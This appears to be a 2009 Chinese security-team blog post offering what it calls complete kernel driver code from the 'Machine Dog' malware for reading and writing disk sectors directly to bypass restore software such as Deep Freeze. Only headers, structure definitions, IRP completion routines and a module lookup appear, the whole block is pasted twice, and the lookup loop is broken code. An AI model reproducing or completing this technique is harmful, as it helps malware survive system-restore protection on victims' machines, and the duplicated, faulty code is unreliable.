机器狗穿透还原的磁盘级文件读写完整驱动代码
作者:admin 日期:2009-11-09
信息来源:*八进制信息安全团队
备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
编译时注意:FileSystemControl的数据结构需要自己添加。
警告:本代码有一定的危险性,纯粹为了研究、学习,勿滥用!
以下给出关键代码 擅长C++的可以去编译下
本人实验N次 虚拟机虽然装了影子系统但是 一直疯狂蓝屏 代码具有高危险性
慎用!后果自负!!!
#include<ntddk.h>
#include<srb.h>
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
extern POBJECT_TYPE* IoDriverObjectType;
LARGE_INTEGER realdiskpos;
ULONG sectorspercluster;
typedef struct RETRIEVAL_POINTERS_BUFFER {
ULONG ExtentCount;
LARGE_INTEGER StartingVcn;
struct {
LARGE_INTEGER NextVcn;
LARGE_INTEGER Lcn;
} Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
typedef struct { LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;
typedef struct _SENSE_DATA {
unsigned char Valid;
unsigned char SegmentNumber;
unsigned char FileMark;
unsigned char Information[4];
unsigned char AdditionalSenseLength;
unsigned char CommandSpecificInformation[4];
unsigned char AdditionalSenseCode;
unsigned char AdditionalSenseCodeQualifier;
unsigned char FieldReplaceableUnitCode;
unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
#pragma pack(1)
typedef struct _PARTITION_ENTRY
{
UCHAR active;
UCHAR StartHead;
UCHAR StartSector;
UCHAR StartCylinder;
UCHAR PartitionType;
UCHAR EndHead;
UCHAR EndSector;
UCHAR EndCylinder;
ULONG StartLBA;
ULONG TotalSector;
} PARTITION_ENTRY, *PPARTITION_ENTRY;
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
typedef struct _BBR_SECTOR
{
USHORT JmpCode;
UCHAR NopCode;
UCHAR OEMName[8];
USHORT BytesPerSector;
UCHAR SectorsPerCluster;
USHORT ReservedSectors;
UCHAR NumberOfFATs;
USHORT RootEntries;
USHORT NumberOfSectors16;
UCHAR MediaDescriptor;
USHORT SectorsPerFAT16;
USHORT SectorsPerTrack;
USHORT HeadsPerCylinder;
ULONG HiddenSectors;
ULONG NumberOfSectors32;
ULONG SectorsPerFAT32;
} BBR_SECTOR, *PBBR_SECTOR;
#pragma pack()
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE AccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID* Object );
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
NTSTATUS
IrpCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
PMDL mdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(! Context)
{
mdl=Irp->MdlAddress;
if(mdl){
DbgPrint("read size: %d..", Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
NTSTATUS IrpCompletionRoutine_0(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
PMDL mdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if (! Context )
{
mdl=Irp->MdlAddress;
if ( mdl )
{
DbgPrint("read size: %d..", Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
}
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
ULONG GetModuleBase(char* name){
ULONG n,i ;
PSYSTEM_MODULE_INFORMATION module;
PVOID pbuftmp;
char modulename[255];
ZwQuerySystemInformation(11, &n, 0, &n);
pbuftmp = ExAllocatePool(NonPagedPool, n);
ZwQuerySystemInformation(11, pbuftmp, n, NULL);
module = (PSYSTEM_MODULE_INFORMATION)((PULONG )pbuftmp + 1 );
n = *((PULONG)pbuftmp );
for ( i = 0; i < n; i++ )
{
strcpy(modulename,module.ImageName + module.ModuleNameOffset);
if(!_strnicmp(modulename,name,strlen(name))){
ExFreePool(pbuftmp);
return (ULONG)module.Base;
}
}
ExFreePool(pbuftmp);
return 0;
}
备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
编译时注意:FileSystemControl的数据结构需要自己添加。
警告:本代码有一定的危险性,纯粹为了研究、学习,勿滥用!
以下给出关键代码 擅长C++的可以去编译下
本人实验N次 虚拟机虽然装了影子系统但是 一直疯狂蓝屏 代码具有高危险性
慎用!后果自负!!!
#include<ntddk.h>
#include<srb.h>
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
extern POBJECT_TYPE* IoDriverObjectType;
LARGE_INTEGER realdiskpos;
ULONG sectorspercluster;
typedef struct RETRIEVAL_POINTERS_BUFFER {
ULONG ExtentCount;
LARGE_INTEGER StartingVcn;
struct {
LARGE_INTEGER NextVcn;
LARGE_INTEGER Lcn;
} Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
typedef struct { LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;
typedef struct _SENSE_DATA {
unsigned char Valid;
unsigned char SegmentNumber;
unsigned char FileMark;
unsigned char Information[4];
unsigned char AdditionalSenseLength;
unsigned char CommandSpecificInformation[4];
unsigned char AdditionalSenseCode;
unsigned char AdditionalSenseCodeQualifier;
unsigned char FieldReplaceableUnitCode;
unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
#pragma pack(1)
typedef struct _PARTITION_ENTRY
{
UCHAR active;
UCHAR StartHead;
UCHAR StartSector;
UCHAR StartCylinder;
UCHAR PartitionType;
UCHAR EndHead;
UCHAR EndSector;
UCHAR EndCylinder;
ULONG StartLBA;
ULONG TotalSector;
} PARTITION_ENTRY, *PPARTITION_ENTRY;
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
typedef struct _BBR_SECTOR
{
USHORT JmpCode;
UCHAR NopCode;
UCHAR OEMName[8];
USHORT BytesPerSector;
UCHAR SectorsPerCluster;
USHORT ReservedSectors;
UCHAR NumberOfFATs;
USHORT RootEntries;
USHORT NumberOfSectors16;
UCHAR MediaDescriptor;
USHORT SectorsPerFAT16;
USHORT SectorsPerTrack;
USHORT HeadsPerCylinder;
ULONG HiddenSectors;
ULONG NumberOfSectors32;
ULONG SectorsPerFAT32;
} BBR_SECTOR, *PBBR_SECTOR;
#pragma pack()
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE AccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID* Object );
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
NTSTATUS
IrpCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
PMDL mdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(! Context)
{
mdl=Irp->MdlAddress;
if(mdl){
DbgPrint("read size: %d..", Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
NTSTATUS IrpCompletionRoutine_0(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
){
PMDL mdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if (! Context )
{
mdl=Irp->MdlAddress;
if ( mdl )
{
DbgPrint("read size: %d..", Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
}
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
ULONG GetModuleBase(char* name){
ULONG n,i ;
PSYSTEM_MODULE_INFORMATION module;
PVOID pbuftmp;
char modulename[255];
ZwQuerySystemInformation(11, &n, 0, &n);
pbuftmp = ExAllocatePool(NonPagedPool, n);
ZwQuerySystemInformation(11, pbuftmp, n, NULL);
module = (PSYSTEM_MODULE_INFORMATION)((PULONG )pbuftmp + 1 );
n = *((PULONG)pbuftmp );
for ( i = 0; i < n; i++ )
{
strcpy(modulename,module.ImageName + module.ModuleNameOffset);
if(!_strnicmp(modulename,name,strlen(name))){
ExFreePool(pbuftmp);
return (ULONG)module.Base;
}
}
ExFreePool(pbuftmp);
return 0;
}
评论: 0 | 查看次数: 7374